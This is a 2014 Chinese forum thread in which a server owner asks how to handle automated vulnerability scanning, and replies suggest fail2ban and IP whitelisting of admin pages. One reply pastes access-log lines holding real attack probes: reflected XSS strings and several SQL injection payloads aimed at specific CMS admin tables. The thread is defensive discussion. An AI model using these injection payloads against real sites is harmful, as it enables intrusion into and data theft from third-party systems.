V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
sunus
V2EX  ›  Linux

服务器被扫描,这种问题一般怎么解决,有什么工具

  •  
  •   sunus ·
    sungitly · 2014-04-18 22:07:56 +08:00 · 9437 次点击
    这是一个创建于 3879 天前的主题,其中的信息可能已经有所发展或是发生改变。
    刚才无意看到阿里云上的服务器的有很多像下面的log


    ... client: 91.208.16.231, server: xxx.com, request: "GET /admin.php HTTP/1.1", upstream: "fastcgi:// 127.0.0...
    ... client: 113.108.82.22, server: xxx.com, request: "GET /admin.php HTTP/1.0", upstream: "fastcgi:// 127.0.0...
    ... client: 113.108.82.22, server: xxx.com, request: "GET /misc.php?mod=faq HTTP/1.0", upstream: ...
    ... client: 24.114.29.162, server: xx.com, request: "GET /admin.php HTTP/1.0", upstream: "fastcgi:// 127.0.0...

    像是被人在扫描。针对这种情况,一般需要做哪些防护措施,有什么工具推荐呢?
    7 条回复    1970-01-01 08:00:00 +08:00
    austinchou0126
        1
    austinchou0126  
       2014-04-18 22:10:05 +08:00
    fail2ban?
    thinkxen
        2
    thinkxen  
       2014-04-19 00:26:52 +08:00 via Android
    同求
    lightforce
        3
    lightforce  
       2014-04-19 00:42:26 +08:00
    @austinchou0126 这个你敢在vps上用?这个对于有点流量的站一般级别日志输出就会瞬间99 CPU,过不了多久就abuse了
    leyle
        4
    leyle  
       2014-04-19 09:37:36 +08:00
    和楼主一样,感觉是脚本小子开了个工具,就开始扫描了,自动的,扫完没发现什么漏洞,估计它就离开了?

    serverxxx.log:[W 140413 10:40:41 web:1728] 404 GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E (123.125.160.215) 0.98ms
    serverxxx.log:[W 140413 10:40:42 web:1728] 404 GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E (123.125.160.215) 0.55ms
    serverxxx.log:[W 140413 10:40:43 web:1728] 404 GET /admin_aspcms/index.asp (123.125.160.215) 0.39ms
    serverxxx.log:[W 140413 10:40:53 web:1728] 404 POST /admin.php (123.125.160.215) 1.30ms
    serverxxx.log:[W 140413 10:40:55 web:1728] 404 POST /index.php?m=announcement&s=admin/notice (123.125.160.215) 0.62ms
    serverxxx.log:[W 140413 10:41:08 web:1728] 404 POST /bocadmin/j/uploadify.php (123.125.160.215) 1.62ms
    serverxxx.log:[W 140413 10:41:09 web:1728] 404 GET /jcms/setup/publishadmin.jsp (123.125.160.215) 0.44ms
    serverxxx.log:[W 140413 10:41:13 web:1728] 404 GET /Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin (123.125.160.215) 0.45ms
    serverxxx.log:[W 140413 10:41:17 web:1728] 404 GET /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20cfreer) (123.125.160.215) 0.43ms
    serverxxx.log:[W 140413 10:41:26 web:1728] 404 GET /admin.php (123.125.160.215) 0.49ms
    serverxxx.log:[W 140413 10:41:32 web:1728] 404 POST /index.php?m=company&s=admin/business_info_list (123.125.160.215) 1.40ms
    serverxxx.log:[W 140413 10:41:39 web:1728] 404 GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=cfreer1122 (123.125.160.215) 0.47ms
    serverxxx.log:[W 140413 10:41:50 web:1728] 404 GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201 (123.125.160.215) 0.62ms
    serverxxx.log:[W 140413 10:41:51 web:1728] 404 POST /index.php?m=payment&s=admin/pickupmod (123.125.160.215) 0.48ms
    serverxxx.log:[W 140413 10:41:52 web:1728] 404 POST /mep-admin/DcServlet (123.125.160.215) 0.65ms
    serverxxx.log:[W 140413 10:41:53 web:1728] 404 GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin (123.125.160.215) 0.47ms
    serverxxx.log:[W 140413 10:42:05 web:1728] 404 GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 (123.125.160.215) 1.46ms
    serverxxx.log:[W 140413 10:42:08 web:1728] 404 GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523 (123.125.160.215) 1.39ms
    xxx_8002.log:[W 140413 10:26:35 web:1728] 404 GET /_vti_bin/_vti_adm/admin.dll (123.125.160.215) 0.42ms
    xxx_8002.log:[W 140413 10:35:20 web:1728] 404 GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7 (123.125.160.215) 1.68ms
    xxx_8002.log:[W 140413 10:39:23 web:1728] 404 GET /admin/index.asp (123.125.160.215) 0.35ms
    xxx_8002.log:[W 140413 10:40:14 web:1728] 404 GET /admin/sysadmin_view.asp (123.125.160.215) 0.39ms
    leyle
        5
    leyle  
       2014-04-19 09:39:28 +08:00
    从这里看构造的url,倒是可以学习一点防攻击的经验,免得自己在这些地方露馅了。
    sunus
        6
    sunus  
    OP
       2014-04-19 12:51:11 +08:00
    @lightforce 有啥建议么
    peartail
        7
    peartail  
       2014-04-19 14:58:23 +08:00
    用 .htaccess 给网站管理员页面设置白名单。只有你自己的 IP 可以访问管理员页面,其他 IP 就 403 拒绝掉。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   955 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 19ms · UTC 22:53 · PVG 06:53 · LAX 14:53 · JFK 17:53
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.